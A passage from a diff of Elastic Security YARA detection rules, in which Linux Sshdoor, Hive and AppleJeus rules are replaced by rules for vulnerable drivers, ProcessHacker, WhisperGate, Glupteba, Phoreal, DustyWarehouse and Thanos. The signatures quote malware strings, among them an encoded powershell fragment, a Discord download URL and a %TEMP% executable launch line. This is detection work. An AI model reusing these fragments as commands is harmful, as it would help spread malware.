"https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "3a364a7a3f6c0f2f925a060e84fb18b16c118125165b5ea6c94363221dc1b6de" + logic_hash = "d234a1e74234400f51c2aa7a9fb1549be1bc422bdf585db7d2ec9ad1ec75e490" score = 75 quality = 75 - tags = "FILE, MEMORY" - fingerprint = "ff44d7b3c8db5cd0d12a99c2aafb1831f63c6253fe0e63fb7d2503bc74e6fca9" - severity = 100 + tags = "FILE" + fingerprint = "13572e1155a5417549508952504b891f0e4f40cb6ff911bdda6f152c051c401c" + threat_name = "Windows.VulnDriver.Sandra" + severity = 50 arch_context = "x86" - scan_context = "file, memory" + scan_context = "file" license = "Elastic License v2" - os = "linux" + os = "windows" strings: - $a = { 24 10 44 39 F8 7F B4 3B 44 24 04 7C AE 3B 44 24 0C 7E 10 41 } + $original_file_name = { 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 53 00 41 00 4E 00 44 00 52 00 41 00 00 00 } + $version = /V\x00S\x00_\x00V\x00E\x00R\x00S\x00I\x00O\x00N\x00_\x00I\x00N\x00F\x00O\x00\x00\x00{0,4}\xbd\x04\xef\xfe[\x00-\xff]{4}(([\x00-\x0c][\x00-\x00])([\x00-\x0a][\x00-\x00])([\x00-\x00][\x00-\x00])([\x00-\x00][\x00-\x00])|([\x00-\xff][\x00-\xff])([\x00-\x09][\x00-\x00])([\x00-\xff][\x00-\xff])([\x00-\xff][\x00-\xff])|([\x00-\x0b][\x00-\x00])([\x00-\x0a][\x00-\x00])([\x00-\xff][\x00-\xff])([\x00-\xff][\x00-\xff]))/ condition: - all of them + int16 ( uint32(0x3C)+0x5c)==0x0001 and $original_file_name and $version } -rule ELASTIC_Linux_Trojan_Sshdoor_7C36D3Dd : FILE MEMORY +rule ELASTIC_Windows_Vulndriver_Sandra_612A7A16 : FILE { meta: - description = "Detects Linux Trojan Sshdoor (Linux.Trojan.Sshdoor)" + description = "Name: sandra.sys, Version: 10.12.0.0" author = "Elastic Security" - id = "7c36d3dd-734f-4485-85c5-906c5ecade77" - date = "2021-01-12" - modified = "2021-09-16" + id = "612a7a16-b616-4a70-9994-cb5aebfa0ca9" + date = "2022-04-07" + modified = "2022-04-07" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Sshdoor.yar#L61-L79" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "def4de838d58c70f9f0ae026cdad3bf09b711a55af97ed20804fa1e34e7b59e9" - logic_hash = "c1b61fce7593a44e47043fac8a6356f9aa9e74b66db005400684a5a79b69a5cd" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_VulnDriver_Sandra.yar#L23-L42" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + logic_hash = "8fda0e1775d903b73836d4103f6e8b0e2f052026b3acdb07bd345b9ddb3c873a" score = 75 quality = 75 - tags = "FILE, MEMORY" - fingerprint = "a644708905c97c784f394ebbd0020dd3b20b52b4f536c844ca860dabea36ceb7" - severity = 100 + tags = "FILE" + fingerprint = "ead3bd8256fbb5d26c4a177298a5cdd14e5eeb73d9336999c0a68ece9efa2d55" + threat_name = "Windows.VulnDriver.Sandra" + severity = 50 arch_context = "x86" - scan_context = "file, memory" + scan_context = "file" license = "Elastic License v2" - os = "linux" + os = "windows" strings: - $a = { 24 20 48 89 E7 C1 EE 03 83 E6 01 FF D3 8B 54 24 20 31 C0 BE 20 00 } + $original_file_name = { 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 73 00 61 00 6E 00 64 00 72 00 61 00 2E 00 73 00 79 00 73 00 00 00 } + $version = /V\x00S\x00_\x00V\x00E\x00R\x00S\x00I\x00O\x00N\x00_\x00I\x00N\x00F\x00O\x00\x00\x00{0,4}\xbd\x04\xef\xfe[\x00-\xff]{4}(([\x00-\x0c][\x00-\x00])([\x00-\x0a][\x00-\x00])([\x00-\x00][\x00-\x00])([\x00-\x00][\x00-\x00])|([\x00-\xff][\x00-\xff])([\x00-\x09][\x00-\x00])([\x00-\xff][\x00-\xff])([\x00-\xff][\x00-\xff])|([\x00-\x0b][\x00-\x00])([\x00-\x0a][\x00-\x00])([\x00-\xff][\x00-\xff])([\x00-\xff][\x00-\xff]))/ condition: - all of them + int16 ( uint32(0x3C)+0x5c)==0x0001 and $original_file_name and $version } -rule ELASTIC_Linux_Trojan_Sshdoor_3E81B1B7 : FILE MEMORY +rule ELASTIC_Windows_Hacktool_Processhacker_3D01069E : FILE { meta: - description = "Detects Linux Trojan Sshdoor (Linux.Trojan.Sshdoor)" + description = "Detects Windows Hacktool Processhacker (Windows.Hacktool.ProcessHacker)" author = "Elastic Security" - id = "3e81b1b7-71bd-4876-a616-ca49ce73c2da" - date = "2021-01-12" - modified = "2021-09-16" + id = "3d01069e-7afb-4da0-b7ac-23f90db26495" + date = "2022-03-30" + modified = "2022-03-30" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Sshdoor.yar#L81-L99" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "def4de838d58c70f9f0ae026cdad3bf09b711a55af97ed20804fa1e34e7b59e9" - logic_hash = "54253df560e6552a728dc2651c557bc23ae8ec4847760290701438821c52342e" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Hacktool_ProcessHacker.yar#L1-L19" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "70211a3f90376bbc61f49c22a63075d1d4ddd53f0aefa976216c46e6ba39a9f4" + logic_hash = "bcba74aa20b62329c48060bfebaf49ab12f89f9ec3a09fc0c0cb702de5e2b940" score = 75 quality = 75 - tags = "FILE, MEMORY" - fingerprint = "7849bb7283adb25c2ee492efd8d9b2c63de7ae701a69e1892cdc25175996b227" + tags = "FILE" + fingerprint = "5d6a0835ac6c0548292ff11741428d7b2f4421ead6d9e2ca35379cbceb6ee68c" severity = 100 arch_context = "x86" - scan_context = "file, memory" + scan_context = "file" license = "Elastic License v2" - os = "linux" + os = "windows" strings: - $a = { 24 24 48 89 E7 C1 EE 05 83 E6 01 FF D3 8B 54 24 28 31 C0 BE 5A 00 } + $original_file_name = "OriginalFilename\x00kprocesshacker.sys" wide fullword condition: - all of them + int16 ( uint32(0x3C)+0x5c)==0x0001 and $original_file_name } -rule ELASTIC_Linux_Trojan_Sshdoor_Cde7Cfd4 : FILE MEMORY +rule ELASTIC_Windows_Trojan_Whispergate_9192618B : FILE MEMORY { meta: - description = "Detects Linux Trojan Sshdoor (Linux.Trojan.Sshdoor)" + description = "Detects Windows Trojan Whispergate (Windows.Trojan.WhisperGate)" author = "Elastic Security" - id = "cde7cfd4-a664-481d-8865-d44332c7f243" - date = "2022-01-05" - modified = "2022-01-26" - reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Sshdoor.yar#L101-L119" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "cd646a1d59c99b9e038098b91cdb63c3fe9b35bb10583bef0ab07260dbd4d23d" - logic_hash = "47967d90a6dbb4461e22998aff5b7e68b4b9007ea7e5e30574ae1f1cfcbaa573" + id = "9192618b-4f3e-4503-a97f-3c4420fb79e0" + date = "2022-01-17" + modified = "2022-01-17" + reference = "https://www.elastic.co/security-labs/operation-bleeding-bear" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Trojan_WhisperGate.yar#L1-L24" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "dcbbae5a1c61dbbbb7dcd6dc5dd1eb1169f5329958d38b58c3fd9384081c9b78" + logic_hash = "28bb08d61d99d2bfc49ba18cdbabc34c31a715ae6439ab25bbce8cc6958ed381" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "65bf31705755b19b1c01bd2bcc00525469c8cd35eaeff51d546a1d0667d8a615" + fingerprint = "21f2a5b730a86567e68491a0d997fc52ba37f28b2164747240a74c225be3c661" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "linux" + os = "windows" strings: - $a = { 75 CC 8B 73 08 48 8B 54 24 08 48 83 C4 18 5B 5D 41 5C 41 5D 4C } + $a1 = "https://cdn.discordapp.com/attachments/" wide + $a2 = "DxownxloxadDxatxxax" wide fullword + $a3 = "powershell" wide fullword + $a4 = "-enc UwB0AGEAcgB0AC" wide fullword + $a5 = "Ylfwdwgmpilzyaph" wide fullword condition: all of them } -rule ELASTIC_Linux_Trojan_Sshdoor_32D9Fb1B : FILE MEMORY +rule ELASTIC_Windows_Trojan_Glupteba_70557305 : FILE MEMORY { meta: - description = "Detects Linux Trojan Sshdoor (Linux.Trojan.Sshdoor)" + description = "Detects Windows Trojan Glupteba (Windows.Trojan.Glupteba)" author = "Elastic Security" - id = "32d9fb1b-79d7-4bd1-bbe5-345550591367" - date = "2022-09-12" - modified = "2022-10-18" + id = "70557305-3d11-4dde-b53b-94f1ecc0380b" + date = "2021-08-08" + modified = "2021-10-04" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Sshdoor.yar#L121-L139" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "ee1f6dbea40d198e437e8c2ae81193472c89e41d1998bee071867dab1ce16b90" - logic_hash = "35ef4f3970484a46d705e6976a9932639d576717454b8e07ed24a72114d9c42d" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Trojan_Glupteba.yar#L1-L24" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "3ad13fd7968f9574d2c822e579291c77a0c525991cfb785cbe6cdd500b737218" + logic_hash = "f3eee9808a1e8a2080116dda7ce795815e1179143c756ea8fdd26070f1f8f74a" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "fa28250df6960ee54de7b0bacb437b543615a241267e34b5a422f231f5088f10" + fingerprint = "bac7daa5c491de8f8a75b203cdb1cdab2c10633aa45a82e6b04d2f577e3e8415" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "linux" + os = "windows" strings: - $a = { 8B 04 25 28 00 00 00 48 89 44 24 08 31 C0 66 0F EF C0 48 85 F6 } + $a1 = "%TEMP%\\app.exe && %TEMP%\\app.exe" + $a2 = "is unavailable%d smbtest" + $a3 = "discovered new server %s" + $a4 = "uldn't get usernamecouldn't hide servicecouldn't" + $a5 = "TERMINATE PROCESS: %ws, %d, %d" ascii fullword + $a6 = "[+] Extracting vulnerable driver as \"%ws\"" ascii fullword condition: all of them } -rule ELASTIC_Linux_Trojan_Sshdoor_7C3Cfc62 : FILE MEMORY +rule ELASTIC_Windows_Trojan_Glupteba_4669Dcd6 : FILE MEMORY { meta: - description = "Detects Linux Trojan Sshdoor (Linux.Trojan.Sshdoor)" + description = "Detects Windows Trojan Glupteba (Windows.Trojan.Glupteba)" author = "Elastic Security" - id = "7c3cfc62-aa90-4c28-b428-e2133a3f10f8" - date = "2022-09-12" - modified = "2022-10-18" + id = "4669dcd6-8e04-416d-91c0-f45816430869" + date = "2021-08-08" + modified = "2021-10-04" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Sshdoor.yar#L141-L159" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "ee1f6dbea40d198e437e8c2ae81193472c89e41d1998bee071867dab1ce16b90" - logic_hash = "da9804489f30b575d2b459f82570f5df07c1777f105cd373c4268f8a31fa4e43" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Trojan_Glupteba.yar#L26-L44" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "1b55042e06f218546db5ddc52d140be4303153d592dcfc1ce90e6077c05e77f7" + logic_hash = "64b2099f40f94b17bc5860b41773c41322420500696d320399ff1c016cb56e15" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "8085c47704b4d6cabad9d1dd48034dc224f725ba22a7872db50c709108bf575d" + fingerprint = "5b598640f42a99b00d481031f5fcf143ffcc32ef002eac095a14edb18d5b02c9" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "linux" + os = "windows" strings: - $a = { 55 48 8D 6F 50 53 49 89 FC 48 89 FB 48 83 EC 10 64 48 8B 04 25 28 00 } + $a1 = { 40 C3 8B 44 24 48 8B 4C 24 44 89 81 AC 00 00 00 8B 44 24 4C 89 81 B0 00 } condition: all of them } -rule ELASTIC_Windows_Ransomware_Hive_55619Cd0 : FILE MEMORY +rule ELASTIC_Windows_Trojan_Phoreal_66E91De3 : FILE MEMORY { meta: - description = "Detects Windows Ransomware Hive (Windows.Ransomware.Hive)" + description = "Detects Windows Trojan Phoreal (Windows.Trojan.Phoreal)" author = "Elastic Security" - id = "55619cd0-6013-45e2-b15e-0dceff9571ab" - date = "2021-08-26" - modified = "2022-01-13" - reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Ransomware_Hive.yar#L1-L21" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "50ad0e6e9dc72d10579c20bb436f09eeaa7bfdbcb5747a2590af667823e85609" - logic_hash = "51e2b03a9f9b92819bbf05ecbb33a23662a40e7d51f9812aa8243c4506057f1f" + id = "66e91de3-a510-4a64-b03d-5385ceb32360" + date = "2022-02-16" + modified = "2022-04-12" + reference = "https://www.elastic.co/security-labs/phoreal-malware-targets-the-southeast-asian-financial-sector" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Trojan_Phoreal.yar#L1-L23" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "88f073552b30462a00d1d612b1638b0508e4ef02c15cf46203998091f0aef4de" + logic_hash = "c68131fd5e0272d3d473db387a186056a38e6611925ae448d5b668022e6e163a" score = 75 - quality = 75 + quality = 73 tags = "FILE, MEMORY" - fingerprint = "04df3169c50fbab4e2b495de5500c62ddf5e76aa8b4a7fc8435f39526f69c52b" + fingerprint = "36c9150137b3d65ea6127abe54571f7346c5ebffd1966bf0a9ff99406fe5aa24" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -75350,30 +75787,31 @@ rule ELASTIC_Windows_Ransomware_Hive_55619Cd0 : FILE MEMORY os = "windows" strings: - $a1 = "google.com/encryptor.(*App).KillProcesses" ascii fullword - $a2 = "- Do not shutdown or reboot your computers, unmount external storages." ascii fullword - $a3 = "hive" + $a1 = { 5C 00 5C 00 2E 00 5C 00 70 00 69 00 70 00 65 00 5C 00 7B 00 41 00 30 00 36 00 46 00 31 00 37 00 36 00 46 00 2D 00 37 00 39 00 46 00 31 00 2D 00 34 00 37 00 33 00 45 00 2D 00 41 00 46 00 34 00 34 00 2D 00 39 00 37 00 36 00 33 00 45 00 33 00 43 00 42 00 33 00 34 00 45 00 35 00 7D 00 } + $a2 = { 4C 00 6F 00 63 00 61 00 6C 00 5C 00 7B 00 35 00 46 00 42 00 43 00 33 00 46 00 35 00 33 00 2D 00 41 00 37 00 36 00 44 00 2D 00 34 00 32 00 34 00 38 00 2D 00 39 00 36 00 39 00 41 00 2D 00 33 00 31 00 37 00 34 00 30 00 43 00 42 00 43 00 38 00 41 00 44 00 36 00 7D 00 } + $a3 = { 7B 46 44 35 46 38 34 34 37 2D 36 35 37 41 2D 34 35 43 31 2D 38 39 34 42 2D 44 35 33 33 39 32 36 43 39 42 36 36 7D 2E 64 6C 6C } + $b1 = { 8B FF 55 8B EC 56 E8 3F 3E 00 00 E8 34 3E 00 00 50 E8 14 3E 00 00 85 C0 75 2A 8B 75 08 56 E8 21 } condition: - all of them + 2 of them } -rule ELASTIC_Windows_Ransomware_Hive_3Ed67Fe6 : FILE MEMORY +rule ELASTIC_Windows_Trojan_Dustywarehouse_A6Cfc9F7 : FILE MEMORY { meta: - description = "Detects Windows Ransomware Hive (Windows.Ransomware.Hive)" + description = "Detects Windows Trojan Dustywarehouse (Windows.Trojan.DustyWarehouse)" author = "Elastic Security" - id = "3ed67fe6-6347-4aef-898d-4cb267bcbfc7" - date = "2021-08-26" - modified = "2022-01-13" + id = "a6cfc9f7-6d4a-4904-8294-790243eca76a" + date = "2023-08-25" + modified = "2023-11-02" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Ransomware_Hive.yar#L23-L45" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "50ad0e6e9dc72d10579c20bb436f09eeaa7bfdbcb5747a2590af667823e85609" - logic_hash = "a599f0d528bdbec00afa7e9a5cddec5e799ee755a7f30af70dde7d2459b70155" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Trojan_DustyWarehouse.yar#L1-L23" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "8c4de69e89dcc659d2fff52d695764f1efd7e64e0a80983ce6d0cb9eeddb806c" + logic_hash = "2b4cd9316e2fda882c95673edecb9c82a03ef4fdcc2d2e25783644cc5dfb5bf0" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "a15acde0841f08fc44fdc1fea01c140e9e8af6275a65bec4a7b762494c9e6185" + fingerprint = "a0ef31535c7df8669e2b0cf38e9128e662bf64decabac5c9f3dad3a98f811033" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -75381,32 +75819,32 @@ rule ELASTIC_Windows_Ransomware_Hive_3Ed67Fe6 : FILE MEMORY os = "windows" strings: - $a1 = "bmr|sql|oracle|postgres|redis|vss|backup|sstp" - $a2 = "key.hive" - $a3 = "Killing processes" - $a4 = "Stopping services" - $a5 = "Removing itself" + $a1 = "%4d.%2d.%2d-%2d:%2d:%2d" wide fullword + $a2 = ":]%d-%d-%d %d:%d:%d" wide fullword + $a3 = "\\sys.key" wide fullword + $a4 = "[rwin]" wide fullword + $a5 = "Software\\Tencent\\Plugin\\VAS" fullword condition: - all of them + 3 of them } -rule ELASTIC_Windows_Ransomware_Hive_B97Ec33B : FILE MEMORY +rule ELASTIC_Windows_Trojan_Dustywarehouse_3Fef514B : FILE MEMORY { meta: - description = "Detects Windows Ransomware Hive (Windows.Ransomware.Hive)" + description = "Detects Windows Trojan Dustywarehouse (Windows.Trojan.DustyWarehouse)" author = "Elastic Security" - id = "b97ec33b-d4cf-4b70-8ce8-8a5d20448643" - date = "2021-08-26" - modified = "2022-01-13" + id = "3fef514b-9499-47ce-bf84-8393f8d0260f" + date = "2024-05-30" + modified = "2024-06-12" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Ransomware_Hive.yar#L47-L65" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "50ad0e6e9dc72d10579c20bb436f09eeaa7bfdbcb5747a2590af667823e85609" - logic_hash = "10034d9f53fd5099a423269e0c42c01eac18318f5d11599e1390912c8fd7af25" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Trojan_DustyWarehouse.yar#L25-L43" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "4ad024f53595fdd380f5b5950b62595cd47ac424d2427c176a7b2dfe4e1f35f7" + logic_hash = "865ea1e54950a465b71939a41f7a726ccddcfa9f0d777ea853926f65bca0da84" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "7f2c2d299942390d953599b180ed191d9db999275545a7ba29059fd49b858087" + fingerprint = "077bc59b4b6298e405c1cd37d9416667371190e5d8c83a9a9502753c9065df58" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -75414,88 +75852,89 @@ rule ELASTIC_Windows_Ransomware_Hive_B97Ec33B : FILE MEMORY os = "windows" strings: - $a1 = { 74 C3 8B 44 24 78 8B 08 8B 50 04 8B 40 08 89 0C 24 89 54 24 04 89 44 } + $a = { 48 83 EC 30 48 C7 44 24 20 FE FF FF FF 48 89 5C 24 48 48 89 74 24 50 C7 44 24 40 [4] 48 8B 39 48 8B 71 08 48 8B 59 10 48 8B 49 18 ?? ?? ?? ?? ?? ?? 84 DB 74 05 E8 E1 01 00 00 48 8B CE } condition: all of them } -rule ELASTIC_Macos_Backdoor_Applejeus_31872Ae2 : FILE MEMORY +rule ELASTIC_Windows_Ransomware_Thanos_C3522Fd0 : BETA FILE MEMORY { meta: - description = "Detects Macos Backdoor Applejeus (MacOS.Backdoor.Applejeus)" + description = "Identifies THANOS (Hakbit) ransomware" author = "Elastic Security" - id = "31872ae2-f6df-4079-89c2-866cb2e62ec8" - date = "2021-10-18" - modified = "2021-10-25" - reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/MacOS_Backdoor_Applejeus.yar#L1-L19" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "e352d6ea4da596abfdf51f617584611fc9321d5a6d1c22aff243aecdef8e7e55" - logic_hash = "1d6f06668a7d048a93e53b294c5ab8ffe4cd610f3bef3fd80f14425ef8a85a29" + id = "c3522fd0-90e2-4dd9-82f1-4502689270dd" + date = "2020-11-03" + modified = "2021-08-23" + reference = "https://labs.sentinelone.com/thanos-ransomware-riplace-bootlocker-and-more-added-to-feature-set/" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Ransomware_Thanos.yar#L1-L22" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + logic_hash = "00d28aafd242308ad6561547ed8c80dad3086859dacab09ffdd43d436bf9ec52" score = 75 quality = 75 - tags = "FILE, MEMORY" - fingerprint = "24b78b736f691e6b84ba88b0bb47aaba84aad0c0e45cf70f2fa8c455291517df" + tags = "BETA, FILE, MEMORY" + fingerprint = "6d9d6131fd0e3a8585900f4966cb2d1b32e7f5d71b9a65b7a47d80e94bd9f89a" + threat_name = "Windows.Ransomware.Thanos" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "macos" + os = "windows" strings: - $a = { FF CE 74 12 89 F0 31 C9 80 34 0F 63 48 FF C1 48 39 C8 75 F4 } + $c1 = { 0C 89 45 F0 83 65 EC 00 EB 07 8B 45 EC 40 89 45 EC 83 7D EC 18 } + $c2 = { E8 C1 E0 04 8B 4D FC C6 44 01 09 00 8B 45 E8 C1 E0 04 8B 4D FC 83 64 01 } + $c3 = { 00 2F 00 18 46 00 54 00 50 00 20 00 55 00 73 00 65 00 72 00 4E 00 } condition: - all of them + 2 of ($c*) } -rule ELASTIC_Windows_Vulndriver_Llaccess_C57534E8 : FILE +rule ELASTIC_Windows_Ransomware_Thanos_A6C09942 : BETA FILE MEMORY { meta: - description = "Name: Corsair LL Access, Version: 1.0.18.0" + description = "Identifies THANOS (Hakbit) ransomware" author = "Elastic Security" - id = "c57534e8-eb38-4714-9262-c489cc6204f1" - date = "2022-04-04" - modified = "2022-04-04" - reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_VulnDriver_LLAccess.yar#L1-L21" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "000547560fea0dd4b477eb28bf781ea67bf83c748945ce8923f90fdd14eb7a4b" - logic_hash = "8bf629fd2ce0b1f15c7aacd573659b649dcf968556232683b29d68b27d12e577" + id = "a6c09942-0733-40d7-87b7-eb44dd472a35" + date = "2020-11-03" + modified = "2021-08-23" + reference = "https://labs.sentinelone.com/thanos-ransomware-riplace-bootlocker-and-more-added-to-feature-set/" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Ransomware_Thanos.yar#L24-L44" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + logic_hash = "cecdeb21e041c90769b8fd8431fa87943461c1f7faa5ad15918524b91ba5c792" score = 75 quality = 75 - tags = "FILE" - fingerprint = "2eea8941c92353442f7a8986fa3abee06f83824e48bd6a3a5012f7cf76cd543e" - threat_name = "Windows.VulnDriver.LLAccess" - severity = 50 + tags = "BETA, FILE, MEMORY" + fingerprint = "4abcf47243bebc281566ba4929b20950e3f1bfac8976ae5bc6b8ffda85468ec0" + threat_name = "Windows.Ransomware.Thanos" + severity = 100 arch_context = "x86" - scan_context = "file" + scan_context = "file, memory" license = "Elastic License v2" os = "windows" strings: - $original_file_name = { 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 43 00 6F 00 72 00 73 00 61 00 69 00 72 00 20 00 4C 00 4C 00 20 00 41 00 63 00 63 00 65 00 73 00 73 00 00 00 } - $version = /V\x00S\x00_\x00V\x00E\x00R\x00S\x00I\x00O\x00N\x00_\x00I\x00N\x00F\x00O\x00\x00\x00{0,4}\xbd\x04\xef\xfe[\x00-\xff]{4}(([\x00-\x00][\x00-\x00])([\x00-\x01][\x00-\x00])([\x00-\x00][\x00-\x00])([\x00-\x12][\x00-\x00])|([\x00-\xff][\x00-\xff])([\x00-\x00][\x00-\x00])([\x00-\xff][\x00-\xff])([\x00-\xff][\x00-\xff])|([\x00-\x00][\x00-\x00])([\x00-\x01][\x00-\x00])([\x00-\xff][\x00-\xff])([\x00-\x11][\x00-\x00]))/ + $b1 = { 00 57 00 78 00 73 00 49 00 48 00 6C 00 76 00 64 00 58 00 49 00 67 00 5A 00 6D 00 6C 00 73 00 5A 00 58 00 4D 00 67 00 64 00 32 00 56 00 79 00 5A 00 53 00 42 00 6C 00 62 00 6D 00 4E 00 79 00 65 00 58 00 42 00 30 00 5A 00 57 00 51 00 73 00 49 00 47 00 6C 00 6D 00 49 00 48 00 6C 00 76 00 64 00 53 00 42 00 33 00 59 00 57 00 35 00 30 00 49 00 48 00 52 00 76 00 49 00 47 00 64 00 6C 00 64 00 43 00 42 00 30 00 61 00 47 00 56 00 74 00 49 00 47 00 46 00 73 00 62 00 43 00 42 00 69 00 59 00 57 00 4E 00 72 00 4C 00 43 00 42 00 77 00 62 00 47 00 56 00 68 00 63 00 32 00 55 00 67 00 59 00 32 00 46 00 79 00 5A 00 57 00 5A 00 31 00 62 00 47 00 78 00 35 00 49 00 48 00 4A 00 6C 00 59 00 57 00 51 00 67 00 64 00 47 00 68 00 6C 00 49 00 48 00 52 00 6C 00 65 00 48 00 51 00 67 00 62 00 6D 00 39 00 30 00 5A 00 53 00 42 00 73 00 62 00 32 00 4E 00 68 00 64 00 47 00 56 00 6B 00 49 00 47 00 6C 00 75 00 49 00 48 00 6C 00 76 00 64 00 58 00 49 00 67 00 5A 00 47 00 56 00 7A 00 61 00 33 00 52 00 76 00 63 00 43 00 34 00 75 00 4C 00 67 00 3D 00 3D } + $b2 = { 01 0E 0E 05 00 02 0E 0E 0E 04 00 01 01 0E 04 00 01 0E 0E 06 00 03 01 0E 0E 0E 